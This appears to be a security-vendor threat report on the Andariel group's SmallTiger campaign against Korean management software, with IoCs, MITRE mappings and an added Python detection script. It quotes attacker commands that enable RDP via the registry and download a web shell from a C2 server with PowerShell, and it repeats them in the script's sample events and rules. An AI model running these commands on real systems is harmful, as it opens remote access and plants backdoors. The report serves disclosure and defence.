Analysis of Attack Cases Against Korean Solutions by the Andariel Group (SmallTiger)

The Andariel group continues its cyberattacks on South Korean software, particularly targeting asset management and document management solutions. They employ malware like SmallTiger and techniques such as brute force attacks and keylogging to compromise systems. Enhanced security measures are recommended for affected organizations.

Key points:

  • The Andariel group has been attacking South Korean software for years.
  • Asset management solutions are frequently exploited, with malware installation commands executed post-compromise.
  • SmallTiger is a primary malware used by the group.
  • Brute force and dictionary attacks have been employed to seize control of update servers.
  • Keyloggers are used to capture user keystrokes, storing them in “MsMpLog.tmp”.
  • RDP access is configured for future access to infected systems.
  • Recent attacks have also targeted outdated document management solutions.
  • Advanced Port Scanner has been installed post-initial access.
  • Corporate security managers are advised to strengthen monitoring and apply patches.

MITRE Techniques:

  • Credential Dumping (T1003) – Keylogger captures user keystrokes.
  • Remote Desktop Protocol (RDP) (T1076) – RDP access configured using SmallTiger.
  • Exploitation of Public-Facing Application (T1190) – Attacks on outdated Apache Tomcat servers.
  • Command and Control (C2) (T1071) – Use of download server as C&C for SmallTiger.
  • Brute Force (T1110) – Control seized through brute force attacks on update servers.

Indicators of Compromise:

  • [IP Address] 45[.]61[.]148[.]153
  • [URL] http[:]//45[.]61[.]148[.]153/pizza[.]jsp
  • [File Hash] 3525a8a16ce8988885d435133b3e85d8
  • [File Hash] 45ef2e621f4c530437e186914c7a9c62
  • [File Hash] 6a58b52b184715583cda792b56a0a1ed
  • Check the article for all found IoCs.

The Andariel group has been attacking various software used by South Korean companies for years [1]. Notably, these include asset management solutions and data loss prevention (DLP) solutions, and vulnerability attack cases have also been identified in various other solutions.

Attack cases by the Andariel group are continuing in the second half of 2024, primarily installing SmallTiger [2]. A major example of software targeted for exploitation is Korean asset management solutions, which have been exploited for years, and there are also indications of exploitation involving a document centralization solution.

1. Attack Cases on Korean Asset Management Solutions

Asset management solutions are continuously exploited in attacks, and due to their nature, it is presumed that after the control server is compromised, the threat actor exploits it to execute malware installation commands. In most of these attack cases, ModeLoader was installed.

Additionally, there has been a case where control was seized through brute force and dictionary attacks on exposed update servers. In this case, the threat actor replaced the update program with SmallTiger, attempting to distribute SmallTiger across the systems within the organization through this process.

In the recently identified case, neither the initial access vector nor the specific distribution method has been identified, but SmallTiger was installed in the installation path of the asset management solution, and a keylogger was used alongside it. The keylogger is unique in that it stores the user's keystrokes in the "MsMpLog.tmp" file in the same path.

Figure 1. Keylogging data

The threat actor configured the system to allow future RDP access to the infected system using SmallTiger. The following command used to activate RDP was executed through SmallTiger. Additionally, an open-source tool called CreateHiddenAccount was installed to add and conceal a backdoor account.

> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Figure 2. RDP activation command executed through SmallTiger

2. Attack Cases on Document Management Solution

Recently, there have been indications of attacks targeting a Korean document management solution. The Apache Tomcat web servers used by this solution are all outdated versions, and it is presumed that the threat actor targets locations where the latest updates have not been applied.

Figure 3. Compromised web server with Korean document management solution installed

After initial access, the threat actor queried basic system information, and there is also a record of Advanced Port Scanner being installed.

> ping   20.20.100.32
> tasklist
> ipconfig  /all
> netstat  -noa
> whoami

It is presumed that a web shell was subsequently installed using the following PowerShell command. The file can no longer be downloaded, but the download server "45.61.148[.]153" is also identified as the C&C server address for SmallTiger in the asset management solution attack case described above.

> powershell.exe (New-Object System.Net.WebClient).DownloadFile('hxxp://45.61.148[.]153/pizza.jsp','C:*********web*********threadstate.jsp')
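As an added example (not code from the ASEC article), the following Python script flags the two SmallTiger commands described above, the RDP-enabling reg add in section 1 and the WebClient download of a .jsp into a web root in section 2, plus recon commands spawned by a web server process, over constructed process-creation records. The parent-process names, sample paths and rule names are assumptions; the C2 address is the one reported in the article.

```python
import re

# Constructed sample of process-creation records, (parent image, command line),
# as exported from an EDR or Sysmon feed; not real telemetry. The first two mirror
# the commands described in the article, the rest are benign filler.
SAMPLE_EVENTS = [
    ("SmallTiger.exe",
     'reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" '
     '/v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("tomcat9.exe",
     "powershell.exe (New-Object System.Net.WebClient).DownloadFile("
     "'http://45.61.148.153/pizza.jsp','C:\\app\\webapps\\ROOT\\threadstate.jsp')"),
    ("tomcat9.exe", "whoami"),
    ("tomcat9.exe", "netstat -noa"),
    ("explorer.exe", "notepad.exe C:\\Users\\alice\\notes.txt"),
    ("svchost.exe", "reg query HKLM\\SOFTWARE\\Microsoft /s"),
]

# C2 address reported in the article (defanged there as 45[.]61[.]148[.]153).
KNOWN_C2 = {"45.61.148.153"}
WEB_SERVER_PARENTS = {"tomcat9.exe", "tomcat8.exe", "java.exe", "w3wp.exe", "httpd.exe"}
RECON_CMDS = {"whoami", "tasklist", "netstat", "ipconfig", "ping"}

# fDenyTSConnections set to 0 enables Remote Desktop connections.
RDP_ENABLE = re.compile(r"fDenyTSConnections.*?/d\s+0\b", re.IGNORECASE)
# WebClient.DownloadFile(url, dst) where dst is a server-side script extension.
WEBSHELL_DL = re.compile(
    r"DownloadFile\(\s*['\"](?P<url>[^'\"]+)['\"]\s*,\s*['\"](?P<dst>[^'\"]+\.(?:jsp|jspx|aspx|php))['\"]",
    re.IGNORECASE)

def classify(parent, cmdline):
    """Return the list of rule names that match one process-creation record."""
    hits = []
    if RDP_ENABLE.search(cmdline):
        hits.append("rdp_enabled_via_registry")
    m = WEBSHELL_DL.search(cmdline)
    if m:
        hits.append("script_dropped_in_webroot")
        host = re.sub(r"^\w+://", "", m.group("url")).split("/")[0].split(":")[0]
        if host in KNOWN_C2:
            hits.append("known_smalltiger_c2")
    tokens = cmdline.split()
    if parent.lower() in WEB_SERVER_PARENTS and tokens and tokens[0].lower() in RECON_CMDS:
        hits.append("webserver_spawned_recon")
    return hits

def scan(events):
    """Run classify() over every record; keep only records with at least one hit."""
    return [(p, c, h) for p, c in events if (h := classify(p, c))]

if __name__ == "__main__":
    for parent, cmd, hits in scan(SAMPLE_EVENTS):
        print(f"{', '.join(hits):48} {parent} -> {cmd[:70]}")
```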

3. Conclusion

ASEC has recently confirmed that the Andariel group is resuming their attacks using SmallTiger. The group has been exploiting various Korean solutions or attacking vulnerabilities to install malware for years. The recently identified attack cases involve the ongoing exploitation of asset management solutions and newly identified indications of attacks against a Korean document management solution.

Corporate security managers should strengthen the monitoring of centralized management solutions like asset management solutions or document management solutions, and apply patches if there are any security vulnerabilities in the programs. They should also apply the latest patch for OS and programs such as internet browsers and update V3 to the latest version to prevent malware infection in advance.


Full Research: https://asec.ahnlab.com/en/85400/